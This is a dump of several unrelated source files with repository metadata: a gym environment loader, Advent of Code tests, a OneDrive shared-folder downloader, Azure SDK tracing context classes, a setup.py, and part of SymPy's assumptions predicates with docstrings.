gym_env: An instance of OpenAI gym environment.
discount: Discount to use for the environment.
max_episode_steps: If None the max_episode_steps will be set to the default
step limit defined in the environment's spec. No limit is applied if set
to 0 or if there is no timestep_limit set in the environment's spec.
gym_env_wrappers: Iterable with references to wrapper classes to use
directly on the gym environment.
time_limit_wrapper: Wrapper that accepts (env, max_episode_steps) params to
enforce a TimeLimit. Usuaully this should be left as the default,
wrappers.TimeLimit.
env_wrappers: Iterable with references to wrapper classes to use on the
gym_wrapped environment.
spec_dtype_map: A dict that maps gym specs to tf dtypes to use as the
default dtype for the tensors. An easy way how to configure a custom
mapping through Gin is to define a gin-configurable function that returns
desired mapping and call it in your Gin config file, for example:
`suite_gym.load.spec_dtype_map = @get_custom_mapping()`.
auto_reset: If True (default), reset the environment automatically after a
terminal state is reached.
Returns:
A PyEnvironment instance.
"""
for wrapper in gym_env_wrappers:
gym_env = wrapper(gym_env)
env = gym_wrapper.GymWrapper(
gym_env,
discount=discount,
spec_dtype_map=spec_dtype_map,
auto_reset=auto_reset,
)
if max_episode_steps > 0:
env = time_limit_wrapper(env, max_episode_steps)
for wrapper in env_wrappers:
env = wrapper(env)
return env
| 38.571429
| 79
| 0.738986
|
9089e46f122a23df12aa3d9a0cf8e111de603b55
| 566
|
py
|
Python
|
2020/Day17/tests.py
|
dh256/adventofcode
|
428eec13f4cbf153333a0e359bcff23070ef6d27
|
[
"MIT"
] | null | null | null |
2020/Day17/tests.py
|
dh256/adventofcode
|
428eec13f4cbf153333a0e359bcff23070ef6d27
|
[
"MIT"
] | null | null | null |
2020/Day17/tests.py
|
dh256/adventofcode
|
428eec13f4cbf153333a0e359bcff23070ef6d27
|
[
"MIT"
] | null | null | null |
import pytest
from Cubes import Cubes, Cubes2
test_data = [('test1.txt',1,11),('test1.txt',2,21),('test1.txt',6,112)]
test_data2 = [('test1.txt',1,29),('test1.txt',6,848)]
# Part 1
@pytest.mark.parametrize('file_name,cycles,result',test_data)
def test_simulate_cycles(file_name, cycles, result):
cubes = Cubes(file_name)
assert cubes.cycle(cycles) == result
# Part 2
@pytest.mark.parametrize('file_name,cycles,result',test_data2)
def test_simulate_cycles2(file_name, cycles, result):
cubes = Cubes2(file_name)
assert cubes.cycle(cycles) == result
| 31.444444
| 71
| 0.726148
|
fc068434ed8a0441d232c4e1fc0b38004e099159
| 3,566
|
py
|
Python
|
tools/drive_down.py
|
jacke121/HRNet-Facial-Landmark-Detection
|
6d29324ce8bf203518bb8e92d1df919145a7063c
|
[
"MIT"
] | null | null | null |
tools/drive_down.py
|
jacke121/HRNet-Facial-Landmark-Detection
|
6d29324ce8bf203518bb8e92d1df919145a7063c
|
[
"MIT"
] | null | null | null |
tools/drive_down.py
|
jacke121/HRNet-Facial-Landmark-Detection
|
6d29324ce8bf203518bb8e92d1df919145a7063c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from requests import Session
from base64 import b64encode
import aiofiles
import asyncio
import aiohttp
import os
class OneDrive:
"""
Downloads shared file/folder to localhost with persisted structure.
params:
`str:url`: url to the shared one drive folder or file
`str:path`: local filesystem path
methods:
`download() -> None`: fire async download of all files found in URL
"""
def __init__(self, url=None, path=None):
if not (url and path):
raise ValueError("URL to shared resource or path to download is missing.")
self.url = url
self.path = path
self.prefix = "https://api.onedrive.com/v1.0/shares/"
self.suffix = "/root?expand=children"
self.session = Session()
self.session.headers.update(
{
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"
" (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
}
)
def _token(self, url):
return "u!" + b64encode(url.encode()).decode()
def _traverse_url(self, url, name=""):
""" Traverse the folder tree and store leaf urls with filenames """
r = self.session.get(f"{self.prefix}{self._token(url)}{self.suffix}").json()
name = name + os.sep + r["name"]
# shared file
if not r["children"]:
file = {}
file["name"] = name.lstrip(os.sep)
file["url"] = r["@content.downloadUrl"]
self.to_download.append(file)
print(f"Found {file['name']}")
# shared folder
for child in r["children"]:
if "folder" in child:
self._traverse_url(child["webUrl"], name)
if "file" in child:
file = {}
file["name"] = (name + os.sep + child["name"]).lstrip(os.sep)
file["url"] = child["@content.downloadUrl"]
self.to_download.append(file)
print(f"Found {file['name']}")
async def _download_file(self, file, session):
async with session.get(file["url"], timeout=None) as r:
filename = os.path.join(self.path, file["name"])
os.makedirs(os.path.dirname(filename), exist_ok=True)
async with aiofiles.open(filename, "wb") as f:
async for chunk in r.content.iter_chunked(1024 * 16):
if chunk:
await f.write(chunk)
self.downloaded += 1
progress = int(self.downloaded / len(self.to_download) * 100)
print(f"Download progress: {progress}%")
async def _downloader(self):
async with aiohttp.ClientSession() as session:
await asyncio.wait(
[self._download_file(file, session) for file in self.to_download]
)
def download(self):
print("Traversing public folder\n")
self.to_download = []
self.downloaded = 0
self._traverse_url(self.url)
print("\nStarting async download\n")
asyncio.get_event_loop().run_until_complete(self._downloader())
# path could be relative to current working directory of script
# or absolute (e.g. C:\\Users\\Username\\Desktop, /home/username/Desktop)
folder = OneDrive(url="https://1drv.ms/u/s!Aus8VCZ_C_33cMkPimlmClRvmpw", path="Desktop")
folder = OneDrive(url="https://1drv.ms/u/s!AiWjZ1LamlxzdmYbSkHpPYhI8Ms", path=r"D:\project\face\HRNet-Facial-Landmark-Detection")
# fire download
folder.download()
| 34.621359
| 129
| 0.593943
|
f8761cd71502a0f3d88b93dcb63b418003b13263
| 4,244
|
py
|
Python
|
sdk/core/azure-core/azure/core/tracing/context.py
|
jiasli/azure-sdk-for-python
|
f700299c45cea44064d5156f2bfe3664284f6da4
|
[
"MIT"
] | null | null | null |
sdk/core/azure-core/azure/core/tracing/context.py
|
jiasli/azure-sdk-for-python
|
f700299c45cea44064d5156f2bfe3664284f6da4
|
[
"MIT"
] | null | null | null |
sdk/core/azure-core/azure/core/tracing/context.py
|
jiasli/azure-sdk-for-python
|
f700299c45cea44064d5156f2bfe3664284f6da4
|
[
"MIT"
] | null | null | null |
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
"""The context for the azure.core.tracing. Holds global variables in a thread and async safe way."""
import threading
from azure.core.settings import settings
try:
from typing import TYPE_CHECKING
except ImportError:
TYPE_CHECKING = False
if TYPE_CHECKING:
from typing import Any, Callable
from typing_extensions import Protocol
else:
Protocol = object
try:
import contextvars
except ImportError:
contextvars = None
class ContextProtocol(Protocol):
"""
Implements set and get variables in a thread safe way.
"""
def __init__(self, name, default):
# type: (string, Any) -> None
pass
def clear(self):
# type: () -> None
"""Reset the value to the default value"""
pass
def get(self):
# type: () -> Any
"""Get the stored value."""
pass
def set(self, value):
# type: (Any) -> None
"""Set the value in the context."""
pass
class _AsyncContext(object):
"""
Uses contextvars to set and get variables globally in a thread safe way.
"""
def __init__(self, name, default):
self.name = name
self.contextvar = contextvars.ContextVar(name)
self.default = default if callable(default) else (lambda: default)
def clear(self):
# type: () -> None
"""Reset the value to the default value"""
self.contextvar.set(self.default())
def get(self):
# type: () -> Any
"""Get the stored value."""
try:
return self.contextvar.get()
except LookupError:
value = self.default()
self.set(value)
return value
def set(self, value):
# type: (Any) -> None
"""Set the value in the context."""
self.contextvar.set(value)
class _ThreadLocalContext(object):
"""
Uses thread local storage to set and get variables globally in a thread safe way.
"""
_thread_local = threading.local()
def __init__(self, name, default):
# type: (str, Any) -> None
self.name = name
self.default = default if callable(default) else (lambda: default)
def clear(self):
# type: () -> None
"""Reset the value to the default value"""
setattr(self._thread_local, self.name, self.default())
def get(self):
# type: () -> Any
"""Get the stored value."""
try:
return getattr(self._thread_local, self.name)
except AttributeError:
value = self.default()
self.set(value)
return value
def set(self, value):
# type: (Any) -> None
"""Set the value in the context."""
setattr(self._thread_local, self.name, value)
class TracingContext(object):
def __init__(self):
# type: () -> None
context_class = _AsyncContext if contextvars else _ThreadLocalContext
self.current_span = context_class("current_span", None)
def with_current_context(self, func):
# type: (Callable[[Any], Any]) -> Any
"""
Passes the current spans to the new context the function will be run in.
:param func: The function that will be run in the new context
:return: The target the pass in instead of the function
"""
wrapped_span = tracing_context.current_span.get()
wrapper_class = settings.tracing_implementation()
if wrapper_class is not None:
current_impl_span = wrapper_class.get_current_span()
current_impl_tracer = wrapper_class.get_current_tracer()
def call_with_current_context(*args, **kwargs):
if wrapper_class is not None:
wrapper_class.set_current_span(current_impl_span)
wrapper_class.set_current_tracer(current_impl_tracer)
current_span = wrapped_span or wrapper_class(current_impl_span)
self.current_span.set(current_span)
return func(*args, **kwargs)
return call_with_current_context
tracing_context = TracingContext()
| 29.268966
| 100
| 0.604147
|
36f0a43c5b8ceebcc1d995c30a228f020a92105d
| 343
|
py
|
Python
|
setup.py
|
zackchase/beermind
|
695fd1b2f6d376b6dd9f70ba2cd2c13e5efb9c47
|
[
"MIT"
] | 3
|
2016-12-15T11:54:33.000Z
|
2017-06-08T21:10:58.000Z
|
setup.py
|
zackchase/beermind
|
695fd1b2f6d376b6dd9f70ba2cd2c13e5efb9c47
|
[
"MIT"
] | null | null | null |
setup.py
|
zackchase/beermind
|
695fd1b2f6d376b6dd9f70ba2cd2c13e5efb9c47
|
[
"MIT"
] | 2
|
2017-10-13T18:34:36.000Z
|
2020-01-25T03:46:31.000Z
|
from setuptools import setup, find_packages
setup(
name = "deepx",
version = "0.0.0",
author = "Zachary Chase Lipton, Sharad Vikram",
author_email = "sharad.vikram@gmail.com",
license = "MIT",
keywords = "theano",
packages=find_packages(include=[
'deepx',
'dataset',
]),
classifiers=[
],
)
| 20.176471
| 51
| 0.597668
|
b79995b85c0787995083e8174fdd7e29eeab464c
| 43,523
|
py
|
Python
|
sympy/assumptions/ask.py
|
darknight009/sympy
|
618193720b862a41aa295d474793cc12e4de2927
|
[
"BSD-3-Clause"
] | 1
|
2017-04-27T15:45:41.000Z
|
2017-04-27T15:45:41.000Z
|
sympy/assumptions/ask.py
|
darknight009/sympy
|
618193720b862a41aa295d474793cc12e4de2927
|
[
"BSD-3-Clause"
] | 1
|
2015-11-01T17:20:32.000Z
|
2015-11-01T17:20:32.000Z
|
sympy/assumptions/ask.py
|
darknight009/sympy
|
618193720b862a41aa295d474793cc12e4de2927
|
[
"BSD-3-Clause"
] | 1
|
2018-10-22T09:17:11.000Z
|
2018-10-22T09:17:11.000Z
|
"""Module for querying SymPy objects about assumptions."""
from __future__ import print_function, division
from sympy.core import sympify
from sympy.core.cache import cacheit
from sympy.core.relational import Relational
from sympy.logic.boolalg import (to_cnf, And, Not, Or, Implies, Equivalent,
BooleanFunction, BooleanAtom)
from sympy.logic.inference import satisfiable
from sympy.assumptions.assume import (global_assumptions, Predicate,
AppliedPredicate)
from sympy.core.decorators import deprecated
from sympy.utilities.decorator import memoize_property
# Deprecated predicates should be added to this list
deprecated_predicates = [
'bounded',
'infinity',
'infinitesimal'
]
# Memoization storage for predicates
predicate_storage = {}
predicate_memo = memoize_property(predicate_storage)
# Memoization is necessary for the properties of AssumptionKeys to
# ensure that only one object of Predicate objects are created.
# This is because assumption handlers are registered on those objects.
class AssumptionKeys(object):
"""
This class contains all the supported keys by ``ask``.
"""
@predicate_memo
def hermitian(self):
"""
Hermitian predicate.
``ask(Q.hermitian(x))`` is true iff ``x`` belongs to the set of
Hermitian operators.
References
==========
.. [1] http://mathworld.wolfram.com/HermitianOperator.html
"""
# TODO: Add examples
return Predicate('hermitian')
@predicate_memo
def antihermitian(self):
"""
Antihermitian predicate.
``Q.antihermitian(x)`` is true iff ``x`` belongs to the field of
antihermitian operators, i.e., operators in the form ``x*I``, where
``x`` is Hermitian.
References
==========
.. [1] http://mathworld.wolfram.com/HermitianOperator.html
"""
# TODO: Add examples
return Predicate('antihermitian')
@predicate_memo
def real(self):
r"""
Real number predicate.
``Q.real(x)`` is true iff ``x`` is a real number, i.e., it is in the
interval `(-\infty, \infty)`. Note that, in particular the infinities
are not real. Use ``Q.extended_real`` if you want to consider those as
well.
A few important facts about reals:
- Every real number is positive, negative, or zero. Furthermore,
because these sets are pairwise disjoint, each real number is exactly
one of those three.
- Every real number is also complex.
- Every real number is finite.
- Every real number is either rational or irrational.
- Every real number is either algebraic or transcendental.
- The facts ``Q.negative``, ``Q.zero``, ``Q.positive``,
``Q.nonnegative``, ``Q.nonpositive``, ``Q.nonzero``, ``Q.integer``,
``Q.rational``, and ``Q.irrational`` all imply ``Q.real``, as do all
facts that imply those facts.
- The facts ``Q.algebraic``, and ``Q.transcendental`` do not imply
``Q.real``; they imply ``Q.complex``. An algebraic or transcendental
number may or may not be real.
- The "non" facts (i.e., ``Q.nonnegative``, ``Q.nonzero``,
``Q.nonpositive`` and ``Q.noninteger``) are not equivalent to not the
fact, but rather, not the fact *and* ``Q.real``. For example,
``Q.nonnegative`` means ``~Q.negative & Q.real``. So for example,
``I`` is not nonnegative, nonzero, or nonpositive.
Examples
========
>>> from sympy import Q, ask, symbols
>>> x = symbols('x')
>>> ask(Q.real(x), Q.positive(x))
True
>>> ask(Q.real(0))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Real_number
"""
return Predicate('real')
@predicate_memo
def extended_real(self):
r"""
Extended real predicate.
``Q.extended_real(x)`` is true iff ``x`` is a real number or
`\{-\infty, \infty\}`.
See documentation of ``Q.real`` for more information about related facts.
Examples
========
>>> from sympy import ask, Q, oo, I
>>> ask(Q.extended_real(1))
True
>>> ask(Q.extended_real(I))
False
>>> ask(Q.extended_real(oo))
True
"""
return Predicate('extended_real')
@predicate_memo
def imaginary(self):
"""
Imaginary number predicate.
``Q.imaginary(x)`` is true iff ``x`` can be written as a real
number multiplied by the imaginary unit ``I``. Please note that ``0``
is not considered to be an imaginary number.
Examples
========
>>> from sympy import Q, ask, I
>>> ask(Q.imaginary(3*I))
True
>>> ask(Q.imaginary(2 + 3*I))
False
>>> ask(Q.imaginary(0))
False
References
==========
.. [1] https://en.wikipedia.org/wiki/Imaginary_number
"""
return Predicate('imaginary')
@predicate_memo
def complex(self):
"""
Complex number predicate.
``Q.complex(x)`` is true iff ``x`` belongs to the set of complex
numbers. Note that every complex number is finite.
Examples
========
>>> from sympy import Q, Symbol, ask, I, oo
>>> x = Symbol('x')
>>> ask(Q.complex(0))
True
>>> ask(Q.complex(2 + 3*I))
True
>>> ask(Q.complex(oo))
False
References
==========
.. [1] https://en.wikipedia.org/wiki/Complex_number
"""
return Predicate('complex')
@predicate_memo
def algebraic(self):
r"""
Algebraic number predicate.
``Q.algebraic(x)`` is true iff ``x`` belongs to the set of
algebraic numbers. ``x`` is algebraic if there is some polynomial
in ``p(x)\in \mathbb\{Q\}[x]`` such that ``p(x) = 0``.
Examples
========
>>> from sympy import ask, Q, sqrt, I, pi
>>> ask(Q.algebraic(sqrt(2)))
True
>>> ask(Q.algebraic(I))
True
>>> ask(Q.algebraic(pi))
False
References
==========
.. [1] http://en.wikipedia.org/wiki/Algebraic_number
"""
return Predicate('algebraic')
@predicate_memo
def transcendental(self):
"""
Transcedental number predicate.
``Q.transcendental(x)`` is true iff ``x`` belongs to the set of
transcendental numbers. A transcendental number is a real
or complex number that is not algebraic.
"""
# TODO: Add examples
return Predicate('transcendental')
@predicate_memo
def integer(self):
"""
Integer predicate.
``Q.integer(x)`` is true iff ``x`` belongs to the set of integer numbers.
Examples
========
>>> from sympy import Q, ask, S
>>> ask(Q.integer(5))
True
>>> ask(Q.integer(S(1)/2))
False
References
==========
.. [1] https://en.wikipedia.org/wiki/Integer
"""
return Predicate('integer')
@predicate_memo
def rational(self):
"""
Rational number predicate.
``Q.rational(x)`` is true iff ``x`` belongs to the set of
rational numbers.
Examples
========
>>> from sympy import ask, Q, pi, S
>>> ask(Q.rational(0))
True
>>> ask(Q.rational(S(1)/2))
True
>>> ask(Q.rational(pi))
False
References
==========
https://en.wikipedia.org/wiki/Rational_number
"""
return Predicate('rational')
@predicate_memo
def irrational(self):
"""
Irrational number predicate.
``Q.irrational(x)`` is true iff ``x`` is any real number that
cannot be expressed as a ratio of integers.
Examples
========
>>> from sympy import ask, Q, pi, S, I
>>> ask(Q.irrational(0))
False
>>> ask(Q.irrational(S(1)/2))
False
>>> ask(Q.irrational(pi))
True
>>> ask(Q.irrational(I))
False
References
==========
.. [1] https://en.wikipedia.org/wiki/Irrational_number
"""
return Predicate('irrational')
@predicate_memo
def finite(self):
"""
Finite predicate.
``Q.finite(x)`` is true if ``x`` is neither an infinity
nor a ``NaN``. In other words, ``ask(Q.finite(x))`` is true for all ``x``
having a bounded absolute value.
Examples
========
>>> from sympy import Q, ask, Symbol, S, oo, I
>>> x = Symbol('x')
>>> ask(Q.finite(S.NaN))
False
>>> ask(Q.finite(oo))
False
>>> ask(Q.finite(1))
True
>>> ask(Q.finite(2 + 3*I))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Finite
"""
return Predicate('finite')
@predicate_memo
@deprecated(useinstead="finite", issue=9425, deprecated_since_version="1.0")
def bounded(self):
"""
See documentation of ``Q.finite``.
"""
return Predicate('finite')
@predicate_memo
def infinite(self):
"""
Infinite number predicate.
``Q.infinite(x)`` is true iff the absolute value of ``x`` is
infinity.
"""
# TODO: Add examples
return Predicate('infinite')
@predicate_memo
@deprecated(useinstead="infinite", issue=9426, deprecated_since_version="1.0")
def infinity(self):
"""
See documentation of ``Q.infinite``.
"""
return Predicate('infinite')
@predicate_memo
@deprecated(useinstead="zero", issue=9675, deprecated_since_version="1.0")
def infinitesimal(self):
"""
See documentation of ``Q.zero``.
"""
return Predicate('zero')
@predicate_memo
def positive(self):
r"""
Positive real number predicate.
``Q.positive(x)`` is true iff ``x`` is real and `x > 0`, that is if ``x``
is in the interval `(0, \infty)`. In particular, infinity is not
positive.
A few important facts about positive numbers:
- Note that ``Q.nonpositive`` and ``~Q.positive`` are *not* the same
thing. ``~Q.positive(x)`` simply means that ``x`` is not positive,
whereas ``Q.nonpositive(x)`` means that ``x`` is real and not
positive, i.e., ``Q.nonpositive(x)`` is logically equivalent to
`Q.negative(x) | Q.zero(x)``. So for example, ``~Q.positive(I)`` is
true, whereas ``Q.nonpositive(I)`` is false.
- See the documentation of ``Q.real`` for more information about
related facts.
Examples
========
>>> from sympy import Q, ask, symbols, I
>>> x = symbols('x')
>>> ask(Q.positive(x), Q.real(x) & ~Q.negative(x) & ~Q.zero(x))
True
>>> ask(Q.positive(1))
True
>>> ask(Q.nonpositive(I))
False
>>> ask(~Q.positive(I))
True
"""
return Predicate('positive')
@predicate_memo
def negative(self):
r"""
Negative number predicate.
``Q.negative(x)`` is true iff ``x`` is a real number and :math:`x < 0`, that is,
it is in the interval :math:`(-\infty, 0)`. Note in particular that negative
infinity is not negative.
A few important facts about negative numbers:
- Note that ``Q.nonnegative`` and ``~Q.negative`` are *not* the same
thing. ``~Q.negative(x)`` simply means that ``x`` is not negative,
whereas ``Q.nonnegative(x)`` means that ``x`` is real and not
negative, i.e., ``Q.nonnegative(x)`` is logically equivalent to
``Q.zero(x) | Q.positive(x)``. So for example, ``~Q.negative(I)`` is
true, whereas ``Q.nonnegative(I)`` is false.
- See the documentation of ``Q.real`` for more information about
related facts.
Examples
========
>>> from sympy import Q, ask, symbols, I
>>> x = symbols('x')
>>> ask(Q.negative(x), Q.real(x) & ~Q.positive(x) & ~Q.zero(x))
True
>>> ask(Q.negative(-1))
True
>>> ask(Q.nonnegative(I))
False
>>> ask(~Q.negative(I))
True
"""
return Predicate('negative')
@predicate_memo
def zero(self):
"""
Zero number predicate.
``ask(Q.zero(x))`` is true iff the value of ``x`` is zero.
Examples
========
>>> from sympy import ask, Q, oo, symbols
>>> x, y = symbols('x, y')
>>> ask(Q.zero(0))
True
>>> ask(Q.zero(1/oo))
True
>>> ask(Q.zero(0*oo))
False
>>> ask(Q.zero(1))
False
>>> ask(Q.zero(x*y), Q.zero(x) | Q.zero(y))
True
"""
return Predicate('zero')
@predicate_memo
def nonzero(self):
"""
Nonzero real number predicate.
``ask(Q.nonzero(x))`` is true iff ``x`` is real and ``x`` is not zero. Note in
particular that ``Q.nonzero(x)`` is false if ``x`` is not real. Use
``~Q.zero(x)`` if you want the negation of being zero without any real
assumptions.
A few important facts about nonzero numbers:
- ``Q.nonzero`` is logically equivalent to ``Q.positive | Q.negative``.
- See the documentation of ``Q.real`` for more information about
related facts.
Examples
========
>>> from sympy import Q, ask, symbols, I, oo
>>> x = symbols('x')
>>> print(ask(Q.nonzero(x), ~Q.zero(x)))
None
>>> ask(Q.nonzero(x), Q.positive(x))
True
>>> ask(Q.nonzero(x), Q.zero(x))
False
>>> ask(Q.nonzero(0))
False
>>> ask(Q.nonzero(I))
False
>>> ask(~Q.zero(I))
True
>>> ask(Q.nonzero(oo)) #doctest: +SKIP
False
"""
return Predicate('nonzero')
@predicate_memo
def nonpositive(self):
"""
Nonpositive real number predicate.
``ask(Q.nonpositive(x))`` is true iff ``x`` belongs to the set of
negative numbers including zero.
- Note that ``Q.nonpositive`` and ``~Q.positive`` are *not* the same
thing. ``~Q.positive(x)`` simply means that ``x`` is not positive,
whereas ``Q.nonpositive(x)`` means that ``x`` is real and not
positive, i.e., ``Q.nonpositive(x)`` is logically equivalent to
`Q.negative(x) | Q.zero(x)``. So for example, ``~Q.positive(I)`` is
true, whereas ``Q.nonpositive(I)`` is false.
Examples
========
>>> from sympy import Q, ask, I
>>> ask(Q.nonpositive(-1))
True
>>> ask(Q.nonpositive(0))
True
>>> ask(Q.nonpositive(1))
False
>>> ask(Q.nonpositive(I))
False
>>> ask(Q.nonpositive(-I))
False
"""
return Predicate('nonpositive')
@predicate_memo
def nonnegative(self):
"""
Nonnegative real number predicate.
``ask(Q.nonnegative(x))`` is true iff ``x`` belongs to the set of
positive numbers including zero.
- Note that ``Q.nonnegative`` and ``~Q.negative`` are *not* the same
thing. ``~Q.negative(x)`` simply means that ``x`` is not negative,
whereas ``Q.nonnegative(x)`` means that ``x`` is real and not
negative, i.e., ``Q.nonnegative(x)`` is logically equivalent to
``Q.zero(x) | Q.positive(x)``. So for example, ``~Q.negative(I)`` is
true, whereas ``Q.nonnegative(I)`` is false.
Examples
========
>>> from sympy import Q, ask, I
>>> ask(Q.nonnegative(1))
True
>>> ask(Q.nonnegative(0))
True
>>> ask(Q.nonnegative(-1))
False
>>> ask(Q.nonnegative(I))
False
>>> ask(Q.nonnegative(-I))
False
"""
return Predicate('nonnegative')
@predicate_memo
def even(self):
"""
Even number predicate.
``ask(Q.even(x))`` is true iff ``x`` belongs to the set of even
integers.
Examples
========
>>> from sympy import Q, ask, pi
>>> ask(Q.even(0))
True
>>> ask(Q.even(2))
True
>>> ask(Q.even(3))
False
>>> ask(Q.even(pi))
False
"""
return Predicate('even')
@predicate_memo
def odd(self):
"""
Odd number predicate.
``ask(Q.odd(x))`` is true iff ``x`` belongs to the set of odd numbers.
Examples
========
>>> from sympy import Q, ask, pi
>>> ask(Q.odd(0))
False
>>> ask(Q.odd(2))
False
>>> ask(Q.odd(3))
True
>>> ask(Q.odd(pi))
False
"""
return Predicate('odd')
@predicate_memo
def prime(self):
"""
Prime number predicate.
``ask(Q.prime(x))`` is true iff ``x`` is a natural number greater
than 1 that has no positive divisors other than ``1`` and the
number itself.
Examples
========
>>> from sympy import Q, ask
>>> ask(Q.prime(0))
False
>>> ask(Q.prime(1))
False
>>> ask(Q.prime(2))
True
>>> ask(Q.prime(20))
False
>>> ask(Q.prime(-3))
False
"""
return Predicate('prime')
@predicate_memo
def composite(self):
"""
Composite number predicate.
``ask(Q.composite(x))`` is true iff ``x`` is a positive integer and has
at least one positive divisor other than ``1`` and the number itself.
Examples
========
>>> from sympy import Q, ask
>>> ask(Q.composite(0))
False
>>> ask(Q.composite(1))
False
>>> ask(Q.composite(2))
False
>>> ask(Q.composite(20))
True
"""
return Predicate('composite')
@predicate_memo
def commutative(self):
"""
Commutative predicate.
``ask(Q.commutative(x))`` is true iff ``x`` commutes with any other
object with respect to multiplication operation.
"""
# TODO: Add examples
return Predicate('commutative')
@predicate_memo
def is_true(self):
"""
Generic predicate.
``ask(Q.is_true(x))`` is true iff ``x`` is true. This only makes
sense if ``x`` is a predicate.
Examples
========
>>> from sympy import ask, Q, symbols
>>> x = symbols('x')
>>> ask(Q.is_true(True))
True
"""
return Predicate('is_true')
@predicate_memo
def symmetric(self):
"""
Symmetric matrix predicate.
``Q.symmetric(x)`` is true iff ``x`` is a square matrix and is equal to
its transpose. Every square diagonal matrix is a symmetric matrix.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol
>>> X = MatrixSymbol('X', 2, 2)
>>> Y = MatrixSymbol('Y', 2, 3)
>>> Z = MatrixSymbol('Z', 2, 2)
>>> ask(Q.symmetric(X*Z), Q.symmetric(X) & Q.symmetric(Z))
True
>>> ask(Q.symmetric(X + Z), Q.symmetric(X) & Q.symmetric(Z))
True
>>> ask(Q.symmetric(Y))
False
References
==========
.. [1] https://en.wikipedia.org/wiki/Symmetric_matrix
"""
# TODO: Add handlers to make these keys work with
# actual matrices and add more examples in the docstring.
return Predicate('symmetric')
@predicate_memo
def invertible(self):
"""
Invertible matrix predicate.
``Q.invertible(x)`` is true iff ``x`` is an invertible matrix.
A square matrix is called invertible only if its determinant is 0.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol
>>> X = MatrixSymbol('X', 2, 2)
>>> Y = MatrixSymbol('Y', 2, 3)
>>> Z = MatrixSymbol('Z', 2, 2)
>>> ask(Q.invertible(X*Y), Q.invertible(X))
False
>>> ask(Q.invertible(X*Z), Q.invertible(X) & Q.invertible(Z))
True
>>> ask(Q.invertible(X), Q.fullrank(X) & Q.square(X))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Invertible_matrix
"""
return Predicate('invertible')
@predicate_memo
def orthogonal(self):
"""
Orthogonal matrix predicate.
``Q.orthogonal(x)`` is true iff ``x`` is an orthogonal matrix.
A square matrix ``M`` is an orthogonal matrix if it satisfies
``M^TM = MM^T = I`` where ``M^T`` is the transpose matrix of
``M`` and ``I`` is an identity matrix. Note that an orthogonal
matrix is necessarily invertible.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol, Identity
>>> X = MatrixSymbol('X', 2, 2)
>>> Y = MatrixSymbol('Y', 2, 3)
>>> Z = MatrixSymbol('Z', 2, 2)
>>> ask(Q.orthogonal(Y))
False
>>> ask(Q.orthogonal(X*Z*X), Q.orthogonal(X) & Q.orthogonal(Z))
True
>>> ask(Q.orthogonal(Identity(3)))
True
>>> ask(Q.invertible(X), Q.orthogonal(X))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Orthogonal_matrix
"""
return Predicate('orthogonal')
@predicate_memo
def unitary(self):
"""
Unitary matrix predicate.
``Q.unitary(x)`` is true iff ``x`` is a unitary matrix.
Unitary matrix is an analogue to orthogonal matrix. A square
matrix ``M`` with complex elements is unitary if :math:``M^TM = MM^T= I``
where :math:``M^T`` is the conjugate transpose matrix of ``M``.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol, Identity
>>> X = MatrixSymbol('X', 2, 2)
>>> Y = MatrixSymbol('Y', 2, 3)
>>> Z = MatrixSymbol('Z', 2, 2)
>>> ask(Q.unitary(Y))
False
>>> ask(Q.unitary(X*Z*X), Q.unitary(X) & Q.unitary(Z))
True
>>> ask(Q.unitary(Identity(3)))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Unitary_matrix
"""
return Predicate('unitary')
@predicate_memo
def positive_definite(self):
r"""
Positive definite matrix predicate.
If ``M`` is a :math:``n \times n`` symmetric real matrix, it is said
to be positive definite if :math:`Z^TMZ` is positive for
every non-zero column vector ``Z`` of ``n`` real numbers.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol, Identity
>>> X = MatrixSymbol('X', 2, 2)
>>> Y = MatrixSymbol('Y', 2, 3)
>>> Z = MatrixSymbol('Z', 2, 2)
>>> ask(Q.positive_definite(Y))
False
>>> ask(Q.positive_definite(Identity(3)))
True
>>> ask(Q.positive_definite(X + Z), Q.positive_definite(X) &
... Q.positive_definite(Z))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Positive-definite_matrix
"""
return Predicate('positive_definite')
@predicate_memo
def upper_triangular(self):
"""
Upper triangular matrix predicate.
A matrix ``M`` is called upper triangular matrix if :math:`M_{ij}=0`
for :math:`i<j`.
Examples
========
>>> from sympy import Q, ask, ZeroMatrix, Identity
>>> ask(Q.upper_triangular(Identity(3)))
True
>>> ask(Q.upper_triangular(ZeroMatrix(3, 3)))
True
References
==========
.. [1] http://mathworld.wolfram.com/UpperTriangularMatrix.html
"""
return Predicate('upper_triangular')
@predicate_memo
def lower_triangular(self):
"""
Lower triangular matrix predicate.
A matrix ``M`` is called lower triangular matrix if :math:`a_{ij}=0`
for :math:`i>j`.
Examples
========
>>> from sympy import Q, ask, ZeroMatrix, Identity
>>> ask(Q.lower_triangular(Identity(3)))
True
>>> ask(Q.lower_triangular(ZeroMatrix(3, 3)))
True
References
==========
.. [1] http://mathworld.wolfram.com/LowerTriangularMatrix.html
"""
return Predicate('lower_triangular')
@predicate_memo
def diagonal(self):
"""
Diagonal matrix predicate.
``Q.diagonal(x)`` is true iff ``x`` is a diagonal matrix. A diagonal
matrix is a matrix in which the entries outside the main diagonal
are all zero.
Examples
========
>>> from sympy import Q, ask, MatrixSymbol, ZeroMatrix
>>> X = MatrixSymbol('X', 2, 2)
>>> ask(Q.diagonal(ZeroMatrix(3, 3)))
True
>>> ask(Q.diagonal(X), Q.lower_triangular(X) &
... Q.upper_triangular(X))
True
References
==========
.. [1] https://en.wikipedia.org/wiki/Diagonal_matrix
"""
return Predicate('diagonal')
@predicate_memo
def fullrank(self):
"""
Fullrank matrix predicate.
``Q.fullrank(x)`` is true iff ``x`` is a full rank matrix.
A matrix is full rank if all rows and columns of the matrix
